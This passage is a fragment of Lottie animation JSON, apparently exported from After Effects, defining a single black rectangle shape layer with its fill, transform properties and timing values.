8","sr":1,"ks":{"o":{"a":0,"k":100,"ix":11},"r":{"a":0,"k":0,"ix":10},"p":{"a":0,"k":[50,50,0],"ix":2},"a":{"a":0,"k":[0,0,0],"ix":1},"s":{"a":0,"k":[100,100,100],"ix":6}},"ao":0,"shapes":[{"ty":"gr","it":[{"ty":"rc","d":1,"s":{"a":0,"k":[34.906,4.721],"ix":2},"p":{"a":0,"k":[0,0],"ix":3},"r":{"a":0,"k":0,"ix":4},"nm":"Rectangle Path 1","mn":"ADBE Vector Shape - Rect","hd":false},{"ty":"fl","c":{"a":0,"k":[0,0,0,1],"ix":4},"o":{"a":0,"k":100,"ix":5},"r":1,"nm":"Fill 1","mn":"ADBE Vector Graphic - Fill","hd":false},{"ty":"tr","p":{"a":0,"k":[23.498,36.876],"ix":2},"a":{"a":0,"k":[0.344,0.2],"ix":1},"s":{"a":0,"k":[100,92.67],"ix":3},"r":{"a":0,"k":0,"ix":6},"o":{"a":0,"k":100,"ix":7},"sk":{"a":0,"k":0,"ix":4},"sa":{"a":0,"k":0,"ix":5},"nm":"Transform"}],"nm":"Rectangle 1","np":2,"cix":2,"ix":1,"mn":"ADBE Vector Group","hd":false}],"ip":0,"op":167.000006802049,"st":0,"bm":0}],"markers":[]}